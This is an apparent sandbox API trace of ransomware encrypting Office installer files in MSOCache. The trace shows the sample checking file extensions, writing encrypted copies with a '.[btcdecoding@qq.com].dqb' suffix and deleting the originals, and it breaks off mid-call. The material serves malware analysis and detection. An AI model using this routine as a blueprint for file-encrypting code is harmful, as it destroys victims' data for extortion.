HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f24080 | out: hHeap=0x570000) returned 1 [0045.855] CloseHandle (hObject=0x1dc) returned 1 [0045.855] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.855] lstrlenW (lpString=".doc") returned 4 [0045.855] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.855] lstrlenW (lpString=".docx") returned 5 [0045.855] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0045.855] lstrlenW (lpString=".pdf") returned 4 [0045.855] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.855] lstrlenW (lpString=".xls") returned 4 [0045.855] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.855] lstrlenW (lpString=".xlsx") returned 5 [0045.855] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0045.855] lstrlenW (lpString=".ppt") returned 4 [0045.855] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.855] lstrlenW (lpString=".zip") returned 4 [0045.855] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.855] lstrlenW (lpString=".rar") returned 4 [0045.855] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.855] lstrlenW (lpString=".bz2") returned 4 [0045.855] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.855] lstrlenW (lpString=".7z") returned 3 [0045.856] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.856] lstrlenW (lpString=".dbf") returned 4 [0045.856] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.856] lstrlenW (lpString=".1cd") returned 4 [0045.856] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.856] lstrlenW (lpString=".jpg") returned 4 [0045.856] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.856] lstrlenW (lpString=".doc") returned 4 [0045.856] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString=".docx") returned 5 [0045.856] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0045.856] lstrlenW (lpString=".pdf") returned 4 [0045.856] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString=".xls") returned 4 [0045.856] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString=".xlsx") returned 5 [0045.856] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0045.856] lstrlenW (lpString=".ppt") returned 4 [0045.856] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.856] lstrlenW (lpString=".zip") returned 4 [0045.856] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.856] lstrlenW (lpString=".rar") returned 4 [0045.857] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.857] lstrlenW (lpString=".bz2") returned 4 [0045.857] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.857] lstrlenW (lpString=".7z") returned 3 [0045.857] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.857] lstrlenW (lpString=".dbf") returned 4 [0045.857] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.857] lstrlenW (lpString=".1cd") returned 4 [0045.857] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.857] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0045.857] lstrlenW (lpString=".jpg") returned 4 [0045.857] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.857] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0045.857] lstrlenW (lpString="setup.exe") returned 9 [0045.857] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0045.857] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1377656) returned 1 [0045.857] CloseHandle (hObject=0x1dc) returned 1 [0045.857] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0045.858] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.858] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0045.858] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.858] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.858] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0045.858] GetLastError () returned 0x0 [0045.858] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0045.881] WriteFile (in: hFile=0x21c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0046.145] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x50588, lpOverlapped=0x0) returned 1 [0046.157] WriteFile (in: hFile=0x21c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x50590, lpOverlapped=0x0) returned 1 [0046.165] ReadFile (in: hFile=0x1dc, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0046.166] WriteFile (in: hFile=0x21c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0046.166] SetEndOfFile (hFile=0x21c) returned 1 [0046.166] CloseHandle (hObject=0x21c) returned 1 [0046.166] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.166] SetEndOfFile (hFile=0x1dc) returned 1 [0046.456] CloseHandle (hObject=0x1dc) returned 1 [0046.456] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0046.456] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.457] lstrlenW (lpString=".doc") returned 4 [0046.457] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0046.457] lstrlenW (lpString=".docx") returned 5 [0046.457] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0046.457] lstrlenW (lpString=".pdf") returned 4 [0046.457] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0046.457] lstrlenW (lpString=".xls") returned 4 [0046.457] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0046.457] lstrlenW (lpString=".xlsx") returned 5 [0046.457] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0046.457] lstrlenW (lpString=".ppt") returned 4 [0046.457] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.457] lstrlenW (lpString=".zip") returned 4 [0046.457] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0046.457] lstrlenW (lpString=".rar") returned 4 [0046.457] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0046.457] lstrlenW (lpString=".bz2") returned 4 [0046.457] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0046.457] lstrlenW (lpString=".7z") returned 3 [0046.457] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.457] lstrlenW (lpString=".dbf") returned 4 [0046.457] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.457] lstrlenW (lpString=".1cd") returned 4 [0046.457] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.457] lstrlenW (lpString=".jpg") returned 4 [0046.457] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.458] lstrlenW (lpString=".doc") returned 4 [0046.458] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0046.458] lstrlenW (lpString=".docx") returned 5 [0046.458] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0046.458] lstrlenW (lpString=".pdf") returned 4 [0046.458] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0046.458] lstrlenW (lpString=".xls") returned 4 [0046.458] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0046.458] lstrlenW (lpString=".xlsx") returned 5 [0046.458] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0046.458] lstrlenW (lpString=".ppt") returned 4 [0046.458] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.458] lstrlenW (lpString=".zip") returned 4 [0046.458] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0046.458] lstrlenW (lpString=".rar") returned 4 [0046.458] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0046.458] lstrlenW (lpString=".bz2") returned 4 [0046.458] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0046.458] lstrlenW (lpString=".7z") returned 3 [0046.458] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.458] lstrlenW (lpString=".dbf") returned 4 [0046.458] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.458] lstrlenW (lpString=".1cd") returned 4 [0046.458] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0046.458] lstrlenW (lpString=".jpg") returned 4 [0046.458] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0046.459] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0046.459] lstrlenW (lpString="PidGenX.dll") returned 11 [0046.459] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0047.337] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=1463568) returned 1 [0047.337] CloseHandle (hObject=0x180) returned 1 [0047.337] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0047.337] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.337] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0047.337] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.337] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.337] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0047.338] GetLastError () returned 0x0 [0047.338] ReadFile (in: hFile=0x180, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0047.361] WriteFile (in: hFile=0x1dc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0047.379] ReadFile (in: hFile=0x180, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x65520, lpOverlapped=0x0) returned 1 [0047.392] WriteFile (in: hFile=0x1dc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x65530, lpOverlapped=0x0) returned 1 [0047.402] ReadFile (in: hFile=0x180, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.402] WriteFile (in: hFile=0x1dc, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.402] SetEndOfFile (hFile=0x1dc) returned 1 [0047.402] CloseHandle (hObject=0x1dc) returned 1 [0047.402] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.402] SetEndOfFile (hFile=0x180) returned 1 [0047.405] CloseHandle (hObject=0x180) returned 1 [0047.406] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0047.406] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0047.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.406] lstrlenW (lpString=".doc") returned 4 [0047.406] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.406] lstrlenW (lpString=".docx") returned 5 [0047.406] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0047.406] lstrlenW (lpString=".pdf") returned 4 [0047.406] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.406] lstrlenW (lpString=".xls") returned 4 [0047.406] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.406] lstrlenW (lpString=".xlsx") returned 5 [0047.406] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0047.406] lstrlenW (lpString=".ppt") returned 4 [0047.406] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.406] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.406] lstrlenW (lpString=".zip") returned 4 [0047.406] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.406] lstrlenW (lpString=".rar") returned 4 [0047.406] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.406] lstrlenW (lpString=".bz2") returned 4 [0047.406] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.406] lstrlenW (lpString=".7z") returned 3 [0047.407] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString=".dbf") returned 4 [0047.407] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString=".1cd") returned 4 [0047.407] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString=".jpg") returned 4 [0047.407] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString=".doc") returned 4 [0047.407] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString=".docx") returned 5 [0047.407] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0047.407] lstrlenW (lpString=".pdf") returned 4 [0047.407] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString=".xls") returned 4 [0047.407] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString=".xlsx") returned 5 [0047.407] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0047.407] lstrlenW (lpString=".ppt") returned 4 [0047.407] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString=".zip") returned 4 [0047.407] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString=".rar") returned 4 [0047.407] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.407] lstrlenW (lpString=".bz2") returned 4 [0047.407] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.407] lstrlenW (lpString=".7z") returned 3 [0047.407] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.407] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.407] lstrlenW (lpString=".dbf") returned 4 [0047.408] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.408] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.408] lstrlenW (lpString=".1cd") returned 4 [0047.408] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.408] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0047.408] lstrlenW (lpString=".jpg") returned 4 [0047.408] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.408] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0047.408] lstrlenW (lpString="PrjProrWW.msi") returned 13 [0047.408] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0047.409] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=10798080) returned 1 [0047.409] CloseHandle (hObject=0x180) returned 1 [0047.409] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020 [0047.409] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.409] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0047.410] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0047.410] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0047.410] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.410] ReadFile (in: 